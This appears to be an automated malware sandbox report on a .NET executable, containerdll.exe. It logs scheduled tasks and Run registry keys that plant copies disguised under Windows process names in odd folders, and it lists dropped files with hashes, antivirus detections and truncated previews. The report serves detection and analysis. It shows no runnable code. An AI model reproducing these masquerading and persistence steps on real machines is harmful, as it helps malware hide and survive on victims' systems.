            01:27:09Task SchedulerRun new task: WHqeodkmYpJedFVKZpNEincEtJvAcD path: "C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe"
            01:27:09Task SchedulerRun new task: WHqeodkmYpJedFVKZpNEincEtJvAcDW path: "C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe"
            01:27:12Task SchedulerRun new task: Memory Compression path: "C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe"
            01:27:12Task SchedulerRun new task: Memory CompressionM path: "C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe"
            01:27:12Task SchedulerRun new task: RuntimeBroker path: "C:\Recovery\RuntimeBroker.exe"
            01:27:12Task SchedulerRun new task: RuntimeBrokerR path: "C:\Recovery\RuntimeBroker.exe"
            01:27:12Task SchedulerRun new task: ShellExperienceHost path: "C:\Recovery\ShellExperienceHost.exe"
            01:27:12Task SchedulerRun new task: ShellExperienceHostS path: "C:\Recovery\ShellExperienceHost.exe"
            01:27:12Task SchedulerRun new task: sihost path: "C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exe"
            01:27:12Task SchedulerRun new task: sihosts path: "C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exe"
            01:27:12AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WHqeodkmYpJedFVKZpNEincEtJvAcD "C:\Windows\Temp\Crashpad\reports\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe"
            01:27:13Task SchedulerRun new task: WmiPrvSE path: "C:\Users\Default User\Documents\WmiPrvSE.exe"
            01:27:13Task SchedulerRun new task: WmiPrvSEW path: "C:\Users\Default User\Documents\WmiPrvSE.exe"
            01:27:20AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run spoolsv "C:\Users\Public\Desktop\spoolsv.exe"
            01:27:29AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Memory Compression "C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe"
            01:27:37AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ShellExperienceHost "C:\Recovery\ShellExperienceHost.exe"
            01:27:45AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Users\Default User\Documents\WmiPrvSE.exe"
            01:27:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
            01:28:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exe"
            01:28:10AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WHqeodkmYpJedFVKZpNEincEtJvAcD "C:\Windows\Temp\Crashpad\reports\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe"
            01:28:19AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run spoolsv "C:\Users\Public\Desktop\spoolsv.exe"
            01:28:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Memory Compression "C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe"
            01:28:35AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ShellExperienceHost "C:\Recovery\ShellExperienceHost.exe"
            01:28:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Users\Default User\Documents\WmiPrvSE.exe"
            01:28:51AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
            01:28:59AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Program Files\Google\Chrome\Application\SetupMetrics\sihost.exe"
            No context
            No context
            No context
            No context
            No context
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2295296
            Entropy (8bit):7.578559036061074
            Encrypted:false
            SSDEEP:49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
            MD5:28DD5F145AEB9F6E3D1C60BC1DE330B6
            SHA1:DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
            SHA-256:81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
            SHA-512:DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 82%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:ASCII text, with very long lines (335), with no line terminators
            Category:dropped
            Size (bytes):335
            Entropy (8bit):5.815931428931858
            Encrypted:false
            SSDEEP:6:4URLUMEcr0+VKnD8tLyW0ZOKeSKeTfAYqISmKfAJWGGUdloeK7tpQUCEWZ/ZcR6y:4AgMpVKgByW0HePeTftuyWRUd47gU03Y
            MD5:2134D8022975DC6004E04DD2CB603556
            SHA1:296518822B50C823D4049FF3BD2FB353E039F98D
            SHA-256:16F119BAE6BEDD3110A28F03FE665AA083B517AB527A733C13DDC1988007815F
            SHA-512:4BC4D12D51A73365FB46FBB816E69E0BF500D0A9CBC7788DBF7A26B1781DF359F64A4B0014635C5BA48507BFD976B2A9724148992E2FA846EC402C1AEA23F8F1
            Malicious:false
            Preview:xum9ZnDAyP79KvFhW1gm13BOPmBavPRQTW9ZyiVVi9BotJ95Ne14PBc4tXuwmmPi8rpxvpsxgKE21XeFnFNQYWAR4Fpbyit5ucpCeLJhvEXF7kCW3oJgZ8KlqX3pAR98bJHZrblc6pfU94UTDTiJZMfvSEVGReheEZnxcnobDqkud0mwCjmqtziPoWHmGeKcIBPjRh1aoHFsluSbcjEr10uP1YJGgBUjfImclCffsMCmuzn3DpKgadkRQAs2Xv3mwgNdIz0ZEi9pyIfBvPC01yJCiUMlUmH7SZ0NmKuOzvc2d5dIeqHIsCv7WK4ynPEbaCWYRRYkeyBFWRi
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2295296
            Entropy (8bit):7.578559036061074
            Encrypted:false
            SSDEEP:49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
            MD5:28DD5F145AEB9F6E3D1C60BC1DE330B6
            SHA1:DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
            SHA-256:81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
            SHA-512:DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 82%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):173
            Entropy (8bit):5.635128265703238
            Encrypted:false
            SSDEEP:3:DpRJ18z0YsVf/6q4XdtUm826sKpM9D9GHrMA1SU3hfPkuDSnkbzBWCSFMzhGTrU:1dYseXdtf826syMD9AMA1SIhftSnkRWg
            MD5:B9525B6D99BF932609775CBA14983143
            SHA1:63BE3FA285235C8AB79FF57A9021F628EC1B72C7
            SHA-256:8959E935EC5E32897328A1284B38B8DBB3F3400EFDD0B76DBF0621EEFD9CC8A5
            SHA-512:A560D76C00664E964570CA9070FE2A481D1915455C49F66C32EF8D7E293A769DB59BB1ADEA72DDD9C91B7054FAF1C43ADC040010629EDE6AA8D0C0EA36A17586
            Malicious:false
            Preview:ig4sysslxmf4Ap34piP3rukpFyUI0U1fiU8ewWA8Z49Emr5I1Pit2Acx6Pm9XjuduAWqqYHSiRdwvfDX2MRlvInh1LihtAkzJfUmVObcIPLlhpCaLPHKSJsmWyzf0jjiqnnPLaCnuzcf7BALJHVd3ZhAxrPgZ6lipm53CwPvNdZdq
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:ASCII text, with very long lines (659), with no line terminators
            Category:dropped
            Size (bytes):659
            Entropy (8bit):5.896588040734431
            Encrypted:false
            SSDEEP:12:dQMZsbSiZGwc2n1J7h5I2syhZLKei4YkxLT/8ZpLIwQRaNotdxY3sQdKrE:drZsbSccMzhmyhweA8nUPCINozi31KrE
            MD5:0D3E0CF63AC9FFCE8FC7AD060519F3B5
            SHA1:9E2A1A922051346C6BA054F69C531E6BDD8CC542
            SHA-256:5AD68E72CD791F8DBFAF39D3E79D29613A8BB6977872956B39B884A967F2D74C
            SHA-512:9A13B4B63D31B0748D40C12E371158973B66B8CF2338BD5BA110691C72EF18B0DED06B6789DBF7E7602A31F9EE48D30C910985205FE2B939BFF3A40409B7C90B
            Malicious:false
            Preview:TKx8gCDOVFz8aZGQ1c7cfFiDBloExoLuSrhDgDqRGQOKb6oqFpRVdaJNlu64Y8ar3Fps2CtxvpWP1YlF779IXzQ1iTcwGw3IzhQVR6yD5dkyE3WMI17b9STEzxJjk7q9wOZUHQxBJ6M4Pcxp7PoPzcIhNMgdwPd8wlB0eBF2E5SDFZyXAemUTbJUF2G5tTO3dNHoa7L5KvL3KFbyXJdSnIpUbrul4JIurYj2SK6DTqKhQQK9aShk06QUiwMtMjAAnaMvfjgNNa868HELgvLmmi3uHPTf7M0uqJ4zDYd1wUXZ7UVasBNbXXYEgboQPAPAjOQzNOHIRUzRKexx32x69ZWSvzSluNlvFW0sEgNe3EJDiG4Co0WWNSBJ27DX5fYEsDLynEtWpTC4QSuo5Q730PiwVq0GcziXqEVe4FYjHAr3PG3jNZcpifOcfZc7Nm3zupNL7Qtz1XvziphPxR3DX3zL028fnbVfG1Jk2rl6qnxKtY402NK6t0c0zCUERNLZBQtqf6WFp6XuFocc8InaRZwQYSu0XhpcbXJdoNU50FQwdsuLk2GIjvImedSNLgsIR4Ssf8xuyrjMI9wqhjQfag2pPh9L5GuUXIejZCqlEVU2L6deqmpmPMrvBnc79lzr7Pz9fNQe2oaFMAdSDef
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2295296
            Entropy (8bit):7.578559036061074
            Encrypted:false
            SSDEEP:49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
            MD5:28DD5F145AEB9F6E3D1C60BC1DE330B6
            SHA1:DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
            SHA-256:81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
            SHA-512:DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 82%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):144
            Entropy (8bit):5.461407383826414
            Encrypted:false
            SSDEEP:3:PX925JSXqLhvltbBlv4FJ2NP5lUOpW5kWy9/RDo/EdfMSYVXBL8trn:v92K6LhvlrCz23lXpWy9ZD9dfMXjL8x
            MD5:CF2A6A1428FA836C8997A7A7BB6F56FA
            SHA1:38C2FBD8C5933C2383614CC497404DFE1D8DD581
            SHA-256:0757CC484432742D918F96F8A249D6DE0C9A1325D83987F37BA1926B7F15CD51
            SHA-512:E786E18FA9BC8016229F8BB96FAB6B194800959785ECA5A36801FFEDBD68C9E6413017A9375CA15B1651F0582260CF76645347C5871B0FAC452A867AB024B42D
            Malicious:false
            Preview:GXA29e8Z2uh5Sauskxum2w2d9n3CGSMUsjCNTH53Sk3Od5U47XsTT6QTfh2Vl6SjhNMsYgZc10TR3n9ET9Etk3AwTssvPkSVSTrQtmgb7Pbdn8Z1hxCl2j9oMZYpxnNRi79k5tVrdnvUbhJV
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2295296
            Entropy (8bit):7.578559036061074
            Encrypted:false
            SSDEEP:49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
            MD5:28DD5F145AEB9F6E3D1C60BC1DE330B6
            SHA1:DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
            SHA-256:81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
            SHA-512:DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 82%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2295296
            Entropy (8bit):7.578559036061074
            Encrypted:false
            SSDEEP:49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
            MD5:28DD5F145AEB9F6E3D1C60BC1DE330B6
            SHA1:DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
            SHA-256:81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
            SHA-512:DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 82%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:ASCII text, with very long lines (864), with no line terminators
            Category:dropped
            Size (bytes):864
            Entropy (8bit):5.911239749630455
            Encrypted:false
            SSDEEP:24:rgzNoK6s1I+c9WyHrQwdAGqNfQrh4IRkj1n:szN5N++RyHEwuYt4OkJ
            MD5:8E462AD31481E53DE1DB1D4A27083462
            SHA1:2CE691224A9E6AC446B85DE4EDAE78BEB654CECE
            SHA-256:35FE24B6FE9A0872F796BC895A7CF26F95969BCC7F3F226D3429B1F130C335E0
            SHA-512:F2CBCDF904677FD3193A85B9116919106874633D416C05AFD33B6602C93D00EDF274D4DA144A8CC7C138B9DFBC4530E57CED868906CD65A6D48161A1AEDD4204
            Malicious:false
            Preview:JFxfC5oC3lEfqAOjXeHifxc4aXaMV6uoSXSbWRKhew31zNkUBzx5dYWVn3Epecr70ZMSrwMGUjEt4lENxGKgJzL4B6ydMeDBF6AZARmPmrl4TmbBy12XRKyBNSQu7t3zgCo7koMfe54cNRkZexoUmpu4I8MsB1R2xvXQ8dbJpW3WQWx6s1QKEjM0StzmcdemoBob3TaAWfpQvXnvKPAJlGxOjh8OoyqL2QsPrVDYbPyj36E4GDbNdUBhOa2VVLWhydXfpXEyMlsWRNUncDIkWdshPKBQdrDP2RvaijOs9mB1lpQAGO3RDwKVvzPfWxVfiddAc4F3zZkub06k3AKOywMFGZpsTtVLRgTILQiLJ9bnMa343pmWnGqvQY3CPXjGDZc5hyZnc8FyUi3qguyoG9hLzh1wXf6vZVjw87WFQ94oA2breMfei59D1RGA6mP6CTY98HsjYtYHF3K6GJSLAcNeWf5r0WIot7mqdcsXd6Fzh188GK3xTE6jG4mdLBsCltYHQdcoa4rDWX6eh6kqcUUpBCkjzPLcODOxd0rmrPWZX2Ns7I5PaBjQZtFO33zKsOyTJJBqP79M85RJz1lrU6BMd7YuvdtxaLqID4jyGP9dCXReb6YCSH0wNmzLuR5vOLwwPJF4RwkF6iJGp4SyErfSU34bEXDyTOO0kePR1dufhvzpctf08GqhqdcVOo04tvvsTSfLoB7k69viEP8V1M0NhrKHC4CNnzwvAGVKOUL7JGkqs3Q9peCg5hLmIXIu8u7GN9i73yHgA2EbGdYJnChIwP0d5sB0Mb8ZIddtUTF1XgfCdtgp98H5MyU8JFBKwQUj4pSmApyU7qvQtx9LMW0NTCMUJejP
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2295296
            Entropy (8bit):7.578559036061074
            Encrypted:false
            SSDEEP:49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
            MD5:28DD5F145AEB9F6E3D1C60BC1DE330B6
            SHA1:DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
            SHA-256:81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
            SHA-512:DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 82%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:ASCII text, with very long lines (784), with no line terminators
            Category:dropped
            Size (bytes):784
            Entropy (8bit):5.901460550399461
            Encrypted:false
            SSDEEP:24:C3U1XM6jkGHLsKVT5nArVS6nx2XLz2Yxs0yjrwaD2f:9XVFAGnABP+LCYxsF8f
            MD5:B112AEC8C8927B52950F0C3ED6AE81CB
            SHA1:DF381E4E5019F8CE59D51D1DCA3F2C557C5BC9AB
            SHA-256:0409BCACB0C97DE97377D6E6CC4D883DE862049C687E6063B7AFA3DDCA4836DA
            SHA-512:5747C8D06E17E72ED267C164EC91A9380DF5DA7C23FB8120A52603749B19E99E939B73DE3C6BC350EE901E366C493E9C336D311F3AFEBBF3CBAB59BD46CB1E0F
            Malicious:false
            Preview:kslcfm46Hd8cVLtkwmjBJK4eFgRzKoiwqd4KD7jjFgLjfD7PYdXzKgnZxGW9VEwc5Mv1QihyC95m9U9CjBaqRtmK0eW6ljOBusoTRF906jwKlAadHUZTnGLLjlBvLlNcu42QqpueCkur7bi0E3yQK4XnhctqENoUWTarIKxcj5RDWdOICKrSx6S0gOtN5Eay6ZVnB1s3FVrOmURDOln3fVgaAkK3akgffcG6IkHKcxMbOENM6q8UbgSl25marydfzMsKNV5ndcasIFL6X76ulLE8JeDM7qdnUrmCVC9luV18FkcxuqDu2s4nItAsRspx9wYbdIkU7V9PUF2jCQcRmsvlw84lCQTBpD9TMBUmFtwhtoSC0bqBQYKQBwpeN8RrB7jRGjWA50L26O2Hp2uljSvR2sRZWzYGbEfvEB6QEpFaMSUw4hyVOqItMSYXS6oGbEa1sGCo5eg3MUEkXffyBC2v6wiwni8IB98I1dExeKZuKOg2NxAxb0EZLp45iPBXfY2MV6t4brT1mIlsQqjziLrK5j6LjIPOICOvVUgQEFWtgNwCELp2qLzTrrRwAiVScFsk4zW5JSvcz7orw3HXcXi7M5EoDuQguDRaeMIOytsXaXdtCj9Ga80EgvY8vs2YCPswqNMju2isoLgzbUlduKFwNM4tyJcG1UULorDyWaViZHZVOihbHZn2K6jeTdvlac1U0VKtRwHUyhWGwjePmB8bqcBsIif3ouI7PFe3YxJVRTDmjdst8f8YdZoXTblsQNpEZZ0qEl0y1nJX
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:ASCII text, with very long lines (539), with no line terminators
            Category:dropped
            Size (bytes):539
            Entropy (8bit):5.873344604653604
            Encrypted:false
            SSDEEP:12:J2og0q0MCgbXuZx+xWiXclbNetdmctzByGap+Tb+s025BodIvqk8BTn0hab:pRq0MCgzGYx7AQtdmctzCp+62PodSqgC
            MD5:08D63E3185E8697E7359CF662182023A
            SHA1:87669D236307AF98492A8F76D1EBEF03067088DC
            SHA-256:DF729AA34141539809E604655F9F858C584E22E7877AAC9574698A17DAF046E8
            SHA-512:989AC76C452EDD0BBB810535957DD031FFE5E3E44C82750A5C9AAD2A91E67570FC9959B66255A445CEFDE14697765533AE2B8C8170778C7D2DA4281B252D9728
            Malicious:false
            Preview:nfzqoXB3UGs3lhkWFdmhjU1htGnspVmSt1Gd26mrzTbgCqLlD4vCCf7ToR7huSO8eaKubHdJ04rQ2VfD5BpvkjPN3xzk9F7hFdClfbK6amMIyrbSw4msndY4L70oR3Ku6KLYS3hd0tV7XHYMWgxEdP4lFIailgogcbLogCA3WI23HagDioSvGFRrPjSKc82UFyf66upTg3sUWAeplX96O2aWJdY7u0bXPhxT4jHy88PMX6UPFniF95FNYIxcVsipcUFzMKuBPK7PnO9NIJ2HRVYUck5wwodQZjtC1fC42gzy7zkJIkUL0bYH6vWlP7OkrrzDf7VmH7OufjWmAvoMTRa8LlGGJao4SPGQAgoKOsD2NnlWZukeTBRZR1131PdqSUcQdFmeGd8lOhvi9trYzKkQ7r9IouT9OXj2KV3TIGX0DpLtGT3HiF1ItMSvGdzWJ9W082Xo0YPsxtNSfPBU0MbJfbJ8CHMoRBrESUuO6PQJzIU999Q0bef7iNVhsYltLkbwCJALfxYl5RUXGK9C1VMwfuf
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2295296
            Entropy (8bit):7.578559036061074
            Encrypted:false
            SSDEEP:49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
            MD5:28DD5F145AEB9F6E3D1C60BC1DE330B6
            SHA1:DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
            SHA-256:81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
            SHA-512:DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 82%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2295296
            Entropy (8bit):7.578559036061074
            Encrypted:false
            SSDEEP:49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
            MD5:28DD5F145AEB9F6E3D1C60BC1DE330B6
            SHA1:DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
            SHA-256:81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
            SHA-512:DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 82%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2295296
            Entropy (8bit):7.578559036061074
            Encrypted:false
            SSDEEP:49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
            MD5:28DD5F145AEB9F6E3D1C60BC1DE330B6
            SHA1:DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
            SHA-256:81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
            SHA-512:DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 82%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
            File Type:ASCII text, with very long lines (332), with no line terminators
            Category:dropped
            Size (bytes):332
            Entropy (8bit):5.837383316532271
            Encrypted:false
            SSDEEP:6:z5NcTSgzphQD8CuK3GE4+ghW0N0uh44WIorcqRYD1TsxGOT3fhCqLTt:x+QQK3GZ7Wz49orcqR8CZbfnTt
            MD5:AE0E2D05F9F27132F16F01E586073DD8
            SHA1:C86400A07155DC670952176150B5974B559F6558
            SHA-256:68A84850E9B2F2361DAFA1E3A7D493EF49D975EC78F11EA3F355AA6BF07765DC
            SHA-512:BB51D0C76453AF8133218930407EE78949F7DE692A6CAC3D8634E12132F1D3A380FDDBF16B56637E6C53B0C84C8E74ACA1AF81BEFFF029F5913368F6E7CCB814
            Malicious:false
